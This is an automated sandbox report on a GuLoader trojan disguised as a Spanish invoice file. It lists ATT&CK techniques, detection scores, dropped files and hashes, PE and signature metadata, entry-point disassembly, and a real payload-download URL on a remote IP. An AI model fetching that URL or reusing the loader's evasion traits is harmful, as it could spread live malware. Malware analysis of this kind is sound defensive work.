      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Clipboard Data      		1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading      		11
      Process Injection      		Security Account Manager2
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared Drive1
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Deobfuscate/Decode Files or Information      		NTDS23
      System Information Discovery      		Distributed Component Object ModelInput Capture11
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe56%VirustotalBrowse
      FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe42%ReversingLabsWin32.Trojan.Guloader

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\LangDLL.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll0%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.ftp.ftp://ftp.gopher.0%Avira URL Cloudsafe
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bink0%Avira URL Cloudsafe
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bin(0%Avira URL Cloudsafe
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bin0%Avira URL Cloudsafe
      http://nsis.sf.net/NSIS_Error...0%Avira URL Cloudsafe
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binJ0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binfalse
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binkFACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2758695110.0000000002356000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		unknown
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdFACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.00000000005F2000.00000008.00000001.01000000.00000007.sdmpfalse
        		high
        http://212.162.149.153/iXjlIFhRzlkjbZPQm185.binJFACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2758695110.0000000002374000.00000004.00000020.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.ftp.ftp://ftp.gopher.FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.0000000000649000.00000008.00000001.01000000.00000007.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdFACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.00000000005F2000.00000008.00000001.01000000.00000007.sdmpfalse
          		high
          http://nsis.sf.net/NSIS_Error...FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exefalse
          • Avira URL Cloud: safe
          		unknown
          https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000001.2336374289.0000000000649000.00000008.00000001.01000000.00000007.sdmpfalse
            		high
            http://212.162.149.153/iXjlIFhRzlkjbZPQm185.bin(FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe, 00000003.00000002.2758695110.0000000002374000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            212.162.149.153
            		unknownNetherlands
            		64236UNREAL-SERVERSUSfalse

            General Information

            Joe Sandbox version:42.0.0 Malachite
            Analysis ID:1587320
            Start date and time:2025-01-10 07:11:49 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 7m 24s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Run name:Run with higher sleep bypass
            Number of analysed new started processes analysed:5
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
            Detection:MAL
            Classification:mal76.troj.evad.winEXE@3/6@0/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 88%
            • Number of executed functions: 47
            • Number of non-executed functions: 299
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
            • Stop behavior analysis, all processes terminated

            Warnings

            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
            • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.45, 20.12.23.50
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Report size getting too big, too many NtSetInformationFile calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

            Simulations

            Behavior and APIs

            No simulations

            Joe Sandbox View / Context

            IPs

            No context

            Domains

            No context

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            UNREAL-SERVERSUSrArz0wnYVU.exeGet hashmaliciousGuLoaderBrowse
            • 212.162.149.94
            rArz0wnYVU.exeGet hashmaliciousGuLoaderBrowse
            • 212.162.149.94
            RFQ NO 65-58003.exeGet hashmaliciousRemcosBrowse
            • 212.162.149.92
            Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
            • 162.251.122.87
            Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
            • 162.251.122.87
            Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
            • 162.251.122.87
            WO-663071 Sabiya Power Station Project.vbsGet hashmaliciousRemcosBrowse
            • 162.251.122.87
            RFQ 008191.exeGet hashmaliciousRemcos, GuLoaderBrowse
            • 212.162.149.89
            purchase.order.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 212.162.149.66

            JA3 Fingerprints

            No context

            Dropped Files

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dllEL378_SPEC.exeGet hashmaliciousGuLoaderBrowse
              EL378_SPEC.exeGet hashmaliciousGuLoaderBrowse
                DHL_INVOICE.exeGet hashmaliciousGuLoader, LokibotBrowse
                  DHL_#U53d1#U7968.exeGet hashmaliciousGuLoader, LokibotBrowse
                    DHL_INVOICE.exeGet hashmaliciousGuLoaderBrowse
                      DHL_#U53d1#U7968.exeGet hashmaliciousGuLoaderBrowse
                        Ta62k9weDV.exeGet hashmaliciousGuLoaderBrowse
                          Ta62k9weDV.exeGet hashmaliciousGuLoaderBrowse
                            HF-2209869481.exeGet hashmaliciousGuLoaderBrowse

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Temp\fanin\Hortikultur.For

                              Download File
                              Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):298979
                              Entropy (8bit):7.586687461235365
                              Encrypted:false
                              SSDEEP:6144:b0AmmTjA0ppG2c3blFuFuxf0DaPN5ug3yzP:LmmTjxbG2CbHu/+V5v3y7
                              MD5:45893409E37B0F5E8F052154BF1662E9
                              SHA1:5CE2184F0675DD5FAE184B4E8F6264AD72ACDCF3
                              SHA-256:635325D683AF6AAAFB256FF4D53A121B6A3C1465B2BC19010D881700BFA7EA56
                              SHA-512:621D6910CE1B8D3740571D144E40B83DD523693513BB45F01E81BF72CED1165510440002189FD2084EECA9AA703B8D95BEC0BFFD62ABED4E33319FF7A0FF9F8D
                              Malicious:false
                              Reputation:low
                              Preview:...TT....8.N.....ppp....N.....----.=....................##...........1..........vvvvvv..................11.RRRRR.. .\.........;...........cc...................]].......................n..o..........((...........................ttt.........^...(.............................c...SS........-..................g.......................--.ssss.............BB............;.>...x...I........<.y...................C........................................"""".E..$................]].................................4..F.....................................YY..**...........vv...N........xx.........+..'........................{{{.....A.....b..........````....5...E.PPP.NN.........}}....~...888....A.666...........d.........G...oooooo.a.......^........}.....%......V....XX.........L..o.?........."""..nn...R..............CCCC....................kk..............k......v........AA.)..............uuu....))........AA......cc.........................$$...................e..............7....SS...##.W.............

                              C:\Users\user\AppData\Local\Temp\fanin\Leflet\interessereprsentants.hul

                              Download File
                              Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):225235
                              Entropy (8bit):1.2505494983045329
                              Encrypted:false
                              SSDEEP:768:/RwMidX4Q904QeKbFSmjFFrFbCgq4ONJx22YjLusudtedqLIkvO6KdE3r/s4qVZ0:8tsFB+d3KLd1JA37H
                              MD5:6883695B7EE87239D1031F25CB022A43
                              SHA1:4ECA46FA3848E24D7FDD7B79AED8742A58750497
                              SHA-256:8E6299FABA71898C9DB184D0B04DB12307531F61D8B40A12EA436E18F181AA43
                              SHA-512:E2894F566FE1A61DEAEBB081C9452B0E7BB72C7EF5A1E80E0D5C9F74175DB8FAFD461FD3B5B9083153EF5C0FA6D18F10112B03E3966722026C3A1BE5346965FA
                              Malicious:false
                              Reputation:low
                              Preview:.................(.+....(.....v.....A:..Z..............7......X.............................P..........>..............$........................c................................:......y............................\.......................A.b.............................P...............d.....................-................c.....6.......................=.................n..3...........%..d.......................................%....................................................................#............C....................%....C.........................................e............M(....................................................................................................................................... ...............f................,a...........'........................................................................."....e.........................6.............i........................................E...............................................................

                              C:\Users\user\AppData\Local\Temp\fanin\Zooming.Red

                              Download File
                              Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                              File Type:ASCII text, with very long lines (65536), with no line terminators
                              Category:dropped
                              Size (bytes):103368
                              Entropy (8bit):2.6625379092327504
                              Encrypted:false
                              SSDEEP:1536:puAH3GNT2ANNoOWNDtT4UgygquQxv2F4MxDj17Ya/irUJuCvpw:pPkC
                              MD5:A0C3222C6706A6C067303C48A4D936E8
                              SHA1:C15C057DCC249E7C7568EDC30154E89AFB82333D
                              SHA-256:E3066014493AE763047168EBD753EF32C2C03F732FA3BEA8F5CEB2C53F196B0C
                              SHA-512:F02769D95CCC232AEF1A0656564FA6055F91FC2A0EED8F383B0E663B5507C7BF8D59B95FFDFA505BAE5945C7A2E8B3C5964ED3A167EA6E65EA80948CDAA57CD9
                              Malicious:false
                              Reputation:low
                              Preview:00000000004000380000414100008888880000003D3D000000B6000000E2E2007C7C000000626200590000980033000000000000000000280000BBBB00004F4F00000000820018181800232300D9D9D90000008E00A0A0A0A0000000030300EB0042008D8D00000000AF0000050500E7000000BEBEBE00F60000AB00BDBD00920000878700D000000D000000D00042424200000074000078000000B8B800F8F800FEFE0000440041000000ECEC0000000000BE00000600002E00005C00001E1E1E1E1E0000000054545400FAFA0000006A003200CD0000002929000000009E9E9E00000097979700BE0000000000EAEAEAEAEA00F80000A10000F6F6F6F6F6F6F6F600EE00E10000E7E70000CB00D4D40052525252000000FFFF00006A006666666666003E000052005900400046460060600000005B5B001919191900710000000E0E0E0000FD00002E2E00878700008181818100DDDD00EAEAEA00AF00DEDE0000001700EB001F1F1F1F0000007A7A7A00006C0068686868000000BBBBBB00A2A2A20000AA007B7B7B7B0000E5000096005800002200000000A50072003500000F0F0F0F0000424242000000000000003A3A002525252525252500003B3B00007100002000910000000000590000E000320000008080000000000000C8C80000A900004C00C50090900020200000000020000F

                              C:\Users\user\AppData\Local\Temp\fanin\brandy.lea

                              Download File
                              Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):314272
                              Entropy (8bit):1.2593509662318005
                              Encrypted:false
                              SSDEEP:768:fBqB1CAi48on0XydRS4Jbu2SnQ0bR7NZWfw/EIn5D6POQLxALEmpembXYqSxVil5:Z0/0mnzQ3hWdXjGVJ+xajqazD
                              MD5:C7D83B1354B58B52F3EEEB0D54AE8051
                              SHA1:D58F01E64AC4AFE927668F75042DC99A01FC8B26
                              SHA-256:4DE62E400FD03ED1A45A9F90DF6B155F313BD15C2876B0B0AD64E7AA7BBBE12C
                              SHA-512:96801C502EA4E67DFC8380C789DA84307A261F4FBBD2D8ACCF56E95919B63CC7E89D00FADB32C7F95CD1CD75BDBCBC01FF0EC81214587E084726828C974511D7
                              Malicious:false
                              Reputation:low
                              Preview:..................................(..............s..........................................................................T.................................k.....................................................>......................................................Z.r....................\...........,..........]....E......L............................p.................W.....X......6..............................'...................................K.............................7...........p..........................................................................................................................................................%................ .......................n.....`....I...........W..............................."..........X.......;.....................4..;.........Y...........<.................................................................3.....{................................................................................................\.................5

                              C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\LangDLL.dll

                              Download File
                              Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):5120
                              Entropy (8bit):4.289419438668023
                              Encrypted:false
                              SSDEEP:48:qbrtDVP10LgQL8QRU8IlmWm7WmnuWK8hSemoMqG5QEv8sF9U3ofMU:UVPFQIqlemWm7WmTaehG+EkR
                              MD5:E459F344B4A47AF2CF15D821F3946724
                              SHA1:5DF805FCF0A857B98CECCA139B2EA99979C8F01E
                              SHA-256:F4778B8ACA1EB5D93D267468589B4BF45B827A50300EB552D796E9DC22ADE419
                              SHA-512:5B8285A166404C73869D5AAA25C5AF3544AB4A2F012C5EA1E12B04A1D6FA3D32B4A6857E9FD29DD3C86DD5DC8111E3E86DE11BDB5496C1C527FF1BC91BD791BB
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........o_D..1...1...1.n|0...1...0...1..{5...1..{1...1..{....1..{3...1.Rich..1.........PE..L...V+.c.........."!........."............... ...............................p............@.......................... ..L.... ..P....P..`....................`....................................................... ..\............................text............................... ..`.rdata....... ......................@..@.data...4....0......................@....rsrc...`....P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................................

                              C:\Users\user\AppData\Local\Temp\nscDCA5.tmp\System.dll

                              Download File
                              Process:C:\Users\user\Desktop\FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):12288
                              Entropy (8bit):5.974444797015433
                              Encrypted:false
                              SSDEEP:192:U4A1YOTDExj7EFrYCT4E8y3hoSdtTgwF43E7QbGPXI9uIc6gn9Mw:UYR7SrtTv53tdtTgwF4SQbGPX36g9Mw
                              MD5:637E1FA13012A78922B6E98EFC0B12E2
                              SHA1:8012D44E42CD6D813EA63D5CCBF190FE72E3C778
                              SHA-256:703E17D30A91775F8DDC2648B537FC846FAD6415589A503A4529C36F60A17439
                              SHA-512:932ED6A52E89C4FA587A7C0C3903D69CF89A32DBD46ED8DCB251ABB6C15192D92B1F624C31F0E4BD3E9BF95FC1A55FDB7CEE9DD668E1B4F22DDB95786C063E96
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Joe Sandbox View:
                              • Filename: EL378_SPEC.exe, Detection: malicious, Browse
                              • Filename: EL378_SPEC.exe, Detection: malicious, Browse
                              • Filename: DHL_INVOICE.exe, Detection: malicious, Browse
                              • Filename: DHL_#U53d1#U7968.exe, Detection: malicious, Browse
                              • Filename: DHL_INVOICE.exe, Detection: malicious, Browse
                              • Filename: DHL_#U53d1#U7968.exe, Detection: malicious, Browse
                              • Filename: Ta62k9weDV.exe, Detection: malicious, Browse
                              • Filename: Ta62k9weDV.exe, Detection: malicious, Browse
                              • Filename: HF-2209869481.exe, Detection: malicious, Browse
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y.]e..]e..]e......Ze......Ze..]e..Ie......Ye......\e......\e......\e..Rich]e..........................PE..L...^+.c.........."!.....$..........J........@...............................p............@..........................@.......A..P............................`.......................................................@..X............................text...{".......$.................. ..`.rdata.......@.......(..............@..@.data...D....P.......,..............@....reloc.......`......................@..B........................................................................................................................................................................................................................................................................................................................................................................

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                              Entropy (8bit):7.6229397457593615
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:FACTURAS PENDIENTES VAYPER AUTOMOCION 1.exe
                              File size:533'960 bytes
                              MD5:4f2c796aebd02a54ca9bebb0c5bc5ef0
                              SHA1:558e2f3de9077aaf9159c4fb1633d66c75b14dda
                              SHA256:c2f619460d6cd63ca1ae9b9abec61842fa05f09c0698fc4c400ccd5342109692
                              SHA512:8eb1daf79455c75dba4521196c8ef468184f1a0d2c385bd424c4ce82174fe8c2970a47d72fc7d83c444629a236e373a70fb1d3cee236cfff246dba4b8ceb48c7
                              SSDEEP:12288:rRfrRAA+3hDCYCCslgEzlaGuZHStFIH/x5eWJe5:dfNAAmhBCCsRzeRCFoewe5
                              TLSH:6CB402259B4DCC12E4B514BCE732AACAF4FCBD53966A9613F3103E2B857CB819E0D151
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........-.<.L.o.L.o.L.op>.n.L.op>.n.L.op>.n.L.o.L.o.L.oa9.n.L.oa9Vo.L.oa9.n.L.oRich.L.o........PE..L....+.c.................n...*.....

                              File Icon

                              Icon Hash:5b797d7d8d11592d

                              Static PE Info

                              General

                              Entrypoint:0x4036d7
                              Entrypoint Section:.text
                              Digitally signed:true
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x63132B84 [Sat Sep 3 10:25:08 2022 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:3f91aceea750f765ef2ba5d9988e6a00

                              Authenticode Signature

                              Signature Valid:false
                              Signature Issuer:CN=Neuroglia, E=Raagummi@Drove.Ho, O=Neuroglia, L=Hartford, OU="Siamang Virose ", S=Connecticut, C=US
                              Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                              Error Number:-2146762487
                              Not Before, Not After
                              • 23/03/2024 08:06:38 23/03/2025 08:06:38
                              Subject Chain
                              • CN=Neuroglia, E=Raagummi@Drove.Ho, O=Neuroglia, L=Hartford, OU="Siamang Virose ", S=Connecticut, C=US
                              Version:3
                              Thumbprint MD5:F258822B369D369853552E5A72A06C88
                              Thumbprint SHA-1:36E3DCA8400E4D266774CF32D7E5D6D9C2D2E757
                              Thumbprint SHA-256:CB63044CE9D8355C6518EC29E162D6431C74555D2F0496577D9F2F83BFC6150F
                              Serial:0FEFB9AC4FE7B58D3E3EC15139BA5132C65A25C4

                              Entrypoint Preview

                              Instruction
                              sub esp, 000003ECh
                              push ebx
                              push ebp
                              push esi
                              push edi
                              xor ebx, ebx
                              mov edi, 00408528h
                              push 00008001h
                              mov dword ptr [esp+14h], ebx
                              mov ebp, ebx
                              call dword ptr [00408170h]
                              mov esi, dword ptr [004080ACh]
                              lea eax, dword ptr [esp+2Ch]
                              xorps xmm0, xmm0
                              mov dword ptr [esp+40h], ebx
                              push eax
                              movlpd qword ptr [esp+00000144h], xmm0
                              mov dword ptr [esp+30h], 0000011Ch
                              call esi
                              test eax, eax
                              jne 00007FB460846849h
                              lea eax, dword ptr [esp+2Ch]
                              mov dword ptr [esp+2Ch], 00000114h
                              push eax
                              call esi
                              push 00000053h
                              pop eax
                              mov dl, 04h
                              mov byte ptr [esp+00000146h], dl
                              cmp word ptr [esp+40h], ax
                              jne 00007FB460846823h
                              mov eax, dword ptr [esp+5Ah]
                              add eax, FFFFFFD0h
                              mov word ptr [esp+00000140h], ax
                              jmp 00007FB46084681Dh
                              xor eax, eax
                              jmp 00007FB460846804h
                              mov dl, byte ptr [esp+00000146h]
                              cmp dword ptr [esp+30h], 0Ah
                              jnc 00007FB46084681Dh
                              movzx eax, word ptr [esp+38h]
                              mov dword ptr [esp+38h], eax
                              jmp 00007FB460846816h
                              mov eax, dword ptr [esp+38h]
                              mov dword ptr [00429DF8h], eax
                              movzx eax, byte ptr [esp+30h]
                              shl ax, 0008h
                              movzx ecx, ax
                              movzx eax, byte ptr [esp+34h]
                              or ecx, eax
                              movzx eax, byte ptr [esp+00000140h]
                              shl ax, 0008h
                              shl ecx, 10h
                              movzx eax, word ptr [eax]

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x8a000xa0.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x510000x1b7f0.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x817e00xde8
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x6c770x6e0036012ab9d2e677680493425a566cfdc6False0.6476207386363636data6.367752971155868IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x80000x18960x1a002681c11e044872fcca465fa15baf2f57False0.43028846153846156data4.8666844580675965IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0xa0000x1fe000x2003df8362a2e9a26c792a729d2c3b1d553False0.22265625data1.680046922364517IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .ndata0x2a0000x270000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0x510000x1b7f00x1b800a8ef53bebf1cdcba6c23232fbc48ab1bFalse0.38159623579545454DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 32.000000, slope 32.3147055.430171507259301IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0x513280x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.16316692298592217
                              RT_ICON0x61b500x5f42PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9831050602804888
                              RT_ICON0x67a980x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.29906639004149377
                              RT_ICON0x6a0400x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.35389305816135086
                              RT_ICON0x6b0e80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.4360655737704918
                              RT_ICON0x6ba700x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5097517730496454
                              RT_DIALOG0x6bed80xb8dataEnglishUnited States0.6467391304347826
                              RT_DIALOG0x6bf900x144dataEnglishUnited States0.5216049382716049
                              RT_DIALOG0x6c0d80x100dataEnglishUnited States0.5234375
                              RT_DIALOG0x6c1d80x11cdataEnglishUnited States0.6056338028169014
                              RT_DIALOG0x6c2f80x60dataEnglishUnited States0.7291666666666666
                              RT_GROUP_ICON0x6c3580x5adataEnglishUnited States0.7888888888888889
                              RT_VERSION0x6c3b80x194OpenPGP Secret KeyEnglishUnited States0.5668316831683168
                              RT_MANIFEST0x6c5500x29bXML 1.0 document, ASCII text, with very long lines (667), with no line terminatorsEnglishUnited States0.5667166416791605

                              Imports

                              DLLImport
                              ADVAPI32.dllRegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyW, RegEnumValueW, RegQueryValueExW, RegSetValueExW, OpenProcessToken, AdjustTokenPrivileges, LookupPrivilegeValueW, SetFileSecurityW, RegCreateKeyExW, RegOpenKeyExW
                              SHELL32.dllShellExecuteExW, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, SHGetSpecialFolderLocation
                              ole32.dllOleInitialize, OleUninitialize, CoTaskMemFree, IIDFromString, CoCreateInstance
                              COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                              USER32.dllDispatchMessageW, wsprintfA, SystemParametersInfoW, SetClassLongW, GetWindowLongW, GetSysColor, ScreenToClient, SetCursor, GetWindowRect, TrackPopupMenu, AppendMenuW, EnableMenuItem, CreatePopupMenu, GetSystemMenu, GetSystemMetrics, IsWindowEnabled, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, CheckDlgButton, EndDialog, DialogBoxParamW, IsWindowVisible, SetWindowPos, CreateWindowExW, GetClassInfoW, PeekMessageW, CallWindowProcW, GetMessagePos, CharNextW, ExitWindowsEx, SetWindowTextW, SetTimer, CreateDialogParamW, DestroyWindow, LoadImageW, FindWindowExW, SetWindowLongW, InvalidateRect, ReleaseDC, GetDC, SetForegroundWindow, EnableWindow, GetDlgItem, ShowWindow, IsWindow, PostQuitMessage, SendMessageTimeoutW, SendMessageW, wsprintfW, FillRect, GetClientRect, EndPaint, BeginPaint, DrawTextW, DefWindowProcW, SetDlgItemTextW, GetDlgItemTextW, CharNextA, MessageBoxIndirectW, RegisterClassW, CharPrevW, LoadCursorW
                              GDI32.dllSetBkMode, CreateBrushIndirect, GetDeviceCaps, SelectObject, DeleteObject, SetBkColor, SetTextColor, CreateFontIndirectW
